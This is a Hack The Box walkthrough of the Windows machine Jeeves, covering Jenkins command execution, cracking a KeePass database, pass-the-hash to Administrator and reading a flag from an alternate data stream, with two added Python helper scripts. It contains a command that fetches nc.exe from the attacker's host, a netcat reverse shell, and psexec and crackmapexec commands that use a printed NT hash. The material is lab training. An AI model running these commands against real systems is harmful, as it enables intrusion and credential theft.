
Jeeves Walkthrough(Hack The Box)

·468 words·3 mins·
Medium Windows Hack the Box Hacking Web Walkthrough

Reconnaissance

  • The Nmap scan shows ports 80, 135 and 445 open on the machine (135 and 445 are the usual Windows RPC and SMB pair).
  • Port 80 serves a web application with a search box for articles. That was my initial impression.
  • The host runs Windows 10, and the search option leads to an error page, surprisingly. It is an SQL error.
  • The error page also leaks server information.
  • I tried everything from directory enumeration to host enumeration and it all failed. The reason is that I had overlooked another port, 50000, which also serves a web page.

Enumeration

  • Fuzzing directories on port 50000 with ffuf (the :FUZZ suffix binds the wordlist to the FUZZ keyword, -t 60 sets the thread count) gets a hit:
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://jeeves.htb:50000/FUZZ -t 60


  • After browsing to that directory I was happy to see Jenkins. I have exploited Jenkins multiple times in THM and HTB; it is relatively easy to leverage for a foothold.
  • I got command execution easily by adding the following command as a build step in a new project, which downloads nc from my machine.

Exploitation

powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.4:8000/nc.exe' -OutFile 'C:\Windows\Temp\good.exe'"
  • Then I executed it with a second build command (good.exe is the renamed nc.exe; <ip> and <port> are my listener):
C:\Windows\Temp\good.exe <ip> <port> -e cmd.exe
  • Soon after getting the user flag I ran whoami /priv, saw SeImpersonatePrivilege enabled, and tried some of the impersonation attacks from Metasploit, but they failed.
  • To upgrade the shell to Meterpreter I used exploit/multi/script/web_delivery with the payload windows/meterpreter/reverse_tcp, because the x64 payload was not working.
  • The module generates a one-liner to paste into the shell session I already had.
  • Soon after executing that command I had a Meterpreter session.
  • As I had no luck with the potato attacks, I checked other directories and found a file in this user's Documents folder: CEH.kdbx.
  • That is a KeePass database, so it needs the master password to unlock.
  • I used john's keepass2john to extract a hash and hashcat to crack it:
keepass2john CEH.kdbx > kdbx.hash
  • Then I cracked the generated hash with hashcat (mode 13400 is KeePass):
hashcat kdbx.hash /usr/share/wordlists/rockyou.txt --user -m 13400
  • I used the --user flag because keepass2john prefixes the hash with the database name, CEH, in the username position.
  • I got the password, which is <Redacted>.
  • I opened the database with kpcli --kdb CEH.kdbx and entered the master password when prompted.
  • Only one entry, holding a password hash, looked interesting to me.
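To make the keepass2john/hashcat step concrete, here is an added example (my code, not part of the original walkthrough) that parses a keepass2john line for a KDBX 3.x database, the "$keepass$*2*..." form that hashcat mode 13400 consumes. It shows the database-name prefix that makes --user necessary, the seeds and known-plaintext block hashcat works with, and the cheap first step of the key derivation (SHA-256 of SHA-256 of the password) before the expensive AES transform rounds. The sample line is constructed filler with a made-up round count, not taken from the real CEH.kdbx.

```python
"""Parse a keepass2john hash line for a KDBX 3.x database ("$keepass$*2*...").

Added example for this walkthrough, not code from the original post. It shows
what the line passed to hashcat -m 13400 contains, why --user is needed when
keepass2john prefixes the database name, and the first (cheap) step of the
key derivation that hashcat then makes expensive with `rounds` AES passes.
The sample line below is constructed filler, not a real database.
"""
import hashlib
from dataclasses import dataclass
from typing import Optional


@dataclass
class KeePassHash:
    user: Optional[str]           # database name keepass2john puts before ':'
    version: int                  # 2 = KDBX 3.x
    rounds: int                   # AES-KDF transform rounds (the cost factor)
    algorithm: int                # 0 = AES, 1 = Twofish
    master_seed: bytes            # 32 bytes
    transform_seed: bytes         # 32 bytes, AES key for the transform rounds
    iv: bytes                     # 16 bytes, CBC IV for the payload
    expected_start_bytes: bytes   # 32 bytes, known plaintext after decryption
    encrypted_first_block: bytes  # 32 bytes, first ciphertext block


# byte lengths of the five hex fields, in order
_FIELD_LENGTHS = (32, 32, 16, 32, 32)


def parse_keepass2john(line: str) -> KeePassHash:
    """Split a keepass2john line into its fields, validating lengths."""
    line = line.strip()
    user: Optional[str] = None
    if not line.startswith("$keepass$"):
        # "CEH:$keepass$*..." form; hashcat needs --user to skip the prefix
        user, sep, line = line.partition(":")
        if not sep or not line.startswith("$keepass$"):
            raise ValueError("not a keepass2john hash line")
    fields = line.split("*")
    if len(fields) != 9:
        # a database with a key file appends extra fields; not handled here
        raise ValueError(f"expected 9 fields, got {len(fields)}")
    version = int(fields[1])
    if version != 2:
        raise ValueError(f"only KDBX 3.x (version 2) lines are handled, got {version}")
    rounds, algorithm = int(fields[2]), int(fields[3])
    if algorithm not in (0, 1):
        raise ValueError(f"unknown cipher id {algorithm}")
    blobs = [bytes.fromhex(f) for f in fields[4:9]]
    for blob, want in zip(blobs, _FIELD_LENGTHS):
        if len(blob) != want:
            raise ValueError(f"field of {len(blob)} bytes, expected {want}")
    return KeePassHash(user, version, rounds, algorithm, *blobs)


def is_keepass2john_line(line: str) -> bool:
    """True when the line parses cleanly; used to filter a mixed hash file."""
    try:
        parse_keepass2john(line)
        return True
    except ValueError:
        return False


def composite_key(password: str) -> bytes:
    """Password-only composite key for KDBX 3.x: SHA-256(SHA-256(password)).

    This is all a cracker can do cheaply. It then AES-ECB-encrypts this value
    with transform_seed `rounds` times, hashes it again, mixes in master_seed
    and decrypts encrypted_first_block to compare with expected_start_bytes,
    which is why a high round count slows hashcat down.
    """
    inner = hashlib.sha256(password.encode("utf-8")).digest()
    return hashlib.sha256(inner).digest()


def cracking_cost(h: KeePassHash) -> int:
    """AES block operations per guess: the 32-byte key is two ECB blocks per round."""
    return 2 * h.rounds


# Constructed sample: repeating bytes and a made-up round count, not a real database
SAMPLE = (
    "CEH:$keepass$*2*60000*0*" + "11" * 32 + "*" + "22" * 32 + "*"
    + "33" * 16 + "*" + "44" * 32 + "*" + "55" * 32
)

if __name__ == "__main__":
    parsed = parse_keepass2john(SAMPLE)
    print(f"user={parsed.user} rounds={parsed.rounds} cost={cracking_cost(parsed)} AES blocks/guess")
    print("composite key for 'password':", composite_key("password").hex())
```

The round count is the field worth reading before starting a long hashcat job: it is the per-guess cost, so it tells you roughly how far down rockyou.txt you can afford to go.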

Privilege Escalation

  • I checked the hash's validity by authenticating to the machine's SMB service as Administrator with crackmapexec (pass the hash), and it succeeded. The first half, aad3b435b51404eeaad3b435b51404ee, is the empty LM hash; the second half is the NT hash that actually authenticates.
crackmapexec smb 10.10.10.63 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00


  • Then I used psexec.py to pass the hash and get a shell:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63 cmd.exe
  • Administrator's Desktop folder had a file, hm.txt, which said to look elsewhere for the root flag, but dir /R lists alternate data streams, and it showed a stream attached to hm.txt.
  • To read the root flag from that stream I typed more < hm.txt:root.txt
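The dir /R trick generalises: run with /S over a whole tree, save the listing, and pull out every named stream offline. The following is an added example (my code, not from the original walkthrough) that parses that listing format, in which each named stream appears on its own indented line as "<size> <file>:<stream>:$DATA" beneath the file that owns it, and emits the more < commands to read each one. It also filters Zone.Identifier, the mark-of-the-web stream every downloaded file carries, so it does not drown the interesting hits. The listing below is constructed, not the real Desktop output; on the target itself PowerShell's Get-Item -Stream * and Get-Content -Stream give the same view.

```python
"""Find alternate data streams in saved `dir /R [/S]` output.

Added example for this walkthrough, not code from the original post. The
listing at the bottom is constructed to look like `dir /R` output; it is not
the real Desktop listing.
"""
import re
from typing import List, NamedTuple


class Stream(NamedTuple):
    directory: str
    file: str
    stream: str
    size: int


# "Directory of C:\path" headers from dir (also emitted per folder with /S)
_DIR_RE = re.compile(r"^\s*Directory of (.+?)\s*$")
# stream lines carry no date/time, only the size and name:stream:$DATA
_ADS_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Zone.Identifier marks files downloaded from the internet and is usually noise
BENIGN_STREAMS = {"Zone.Identifier"}


def parse_dir_r(listing: str) -> List[Stream]:
    """Return every named stream in the listing, with the folder it was found in."""
    streams: List[Stream] = []
    current = "."
    for line in listing.splitlines():
        m = _DIR_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = _ADS_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            streams.append(Stream(current, m.group(2), m.group(3), size))
    return streams


def read_commands(streams: List[Stream], skip_benign: bool = True) -> List[str]:
    """cmd.exe commands that dump each stream, the way `more < file:stream` does."""
    cmds = []
    for s in streams:
        if skip_benign and s.stream in BENIGN_STREAMS:
            continue
        cmds.append(f'more < "{s.directory}\\{s.file}:{s.stream}"')
    return cmds


# Constructed sample listing in dir /R layout (sizes and dates are made up)
SAMPLE_LISTING = """
 Directory of C:\\Users\\Administrator\\Desktop

01/01/2024  10:00 AM    <DIR>          .
01/01/2024  10:00 AM    <DIR>          ..
01/01/2024  10:05 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
01/01/2024  10:07 AM             1,204 notes.lnk
                                    26 notes.lnk:Zone.Identifier:$DATA
               2 File(s)          1,240 bytes
"""

if __name__ == "__main__":
    for s in parse_dir_r(SAMPLE_LISTING):
        print(f"{s.directory}\\{s.file} -> stream {s.stream} ({s.size} bytes)")
    for cmd in read_commands(parse_dir_r(SAMPLE_LISTING)):
        print(cmd)
```

Feed it the output of dir /R /S C:\Users redirected to a file and it gives a short list of candidate streams; anything that is not Zone.Identifier on a user-writable path deserves a look.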

bye
